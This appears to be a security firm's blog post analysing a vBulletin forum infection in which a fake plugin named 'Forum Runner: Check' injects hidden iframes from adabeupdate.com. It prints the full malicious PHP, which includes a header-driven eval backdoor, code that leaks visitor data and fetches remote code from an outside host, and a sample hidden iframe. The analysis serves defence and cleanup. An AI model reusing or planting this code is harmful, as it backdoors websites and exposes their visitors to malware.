There’s a new hack in which users clicking on Google results for vBulletin forums are served iframes pointing to various infected domains.  The contents of the iframes come from the host adabeupdate.com.  This behavior causes the vBulletin forum to be added to Google’s malware blacklist.  Here’s an example of one we worked on today.

We found the malicious code in a plugin named “Forum Runner: Check” with a hook location of “global_start.”  This was the code:

error_reporting(0);

if ($_SERVER['HTTP_ECMDE']) {
eval(base64_decode($_SERVER['HTTP_ECMDE']));
return;
}

$str = 'v=10&tt=1&i=' . $_SERVER['REMOTE_ADDR'] . '&a=' . urlencode($_SERVER['HTTP_USER_AGENT']) . '&r=' . urlencode($_SERVER['HTTP_REFERER']) . '&f=' . urlencode($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']) . '&dd=4.1.7';
$d = 'front.adabeupdate.com';
$ip = '91.220.173.170';

ob_start();
$datad = getdata('http://' . $d . '/ss?t=f&' . $str);
if ($datad === false) { $datad = getdata('http://' . $ip . '/ss?t=f&' . $str); }
if (eval($datad) === false) { print $datad; }
$template_hook['forcehf'] = ob_get_contents();
ob_end_clean();

function getdata($url)
{
$content = '';
if (ini_get('allow_url_fopen') == '1' && ($fp = fopen($url, 'r')) !==false) {
while ($line = fread($fp, 1024)) { $content .= $line; }
return $content;
} else if (ini_get('allow_url_fopen') == '1' && ($content = file_get_contents($url)) !== false) {
return $content;
} else if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$content = curl_exec($ch);
curl_close($ch);
return $content;
} else if ($content = getRemoteFile($url)) {
return $content;
} else { return false; }
}

function getRemoteFile($url)
{
$parsedUrl = parse_url($url);
$host = $parsedUrl['host'];
if (isset($parsedUrl['path'])) { $path = $parsedUrl['path']; } else {  $path = '/'; }
if (isset($parsedUrl['query'])) { $path .= '?' . $parsedUrl['query']; }
if (isset($parsedUrl['port'])) { $port = $parsedUrl['port']; } else { $port = '80';  }
$response = '';
$fp = @fsockopen($host, $port, $errno, $errstr, 10);
if( !$fp || $fp === false) { return false; } else {
fputs($fp, "GET $path HTTP/1.0
" .
"Host: $host
" .
"Accept: */*
" .
"Accept-Language: en-us,en;q=0.5
" .
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
" .
"Keep-Alive: 300
" .
"Connection: keep-alive

");
while ( $line = fread( $fp, 1024 ) ) {
$response .= $line;
}
fclose( $fp );
$pos = strpos($response, "

");
$response = substr($response, $pos + 4);
}
return $response;
}

It’s pretty simple; it just fetches code from adabeupdate.com and adds it to the output buffer for the vBulletin pages.  The code in this case was a hidden iframe pointing to another site (interestingly, running on port 38 or 36).  Example:

<iframe src=”http://dgr4.tr************rt.com:38/mean.php” height=”0″ width=”0″>

We’re not sure yet if there’s a common attack vector used in this type of infection, but investigation is still ongoing.  If your vBulletin site has this problem, contact us for help solving it.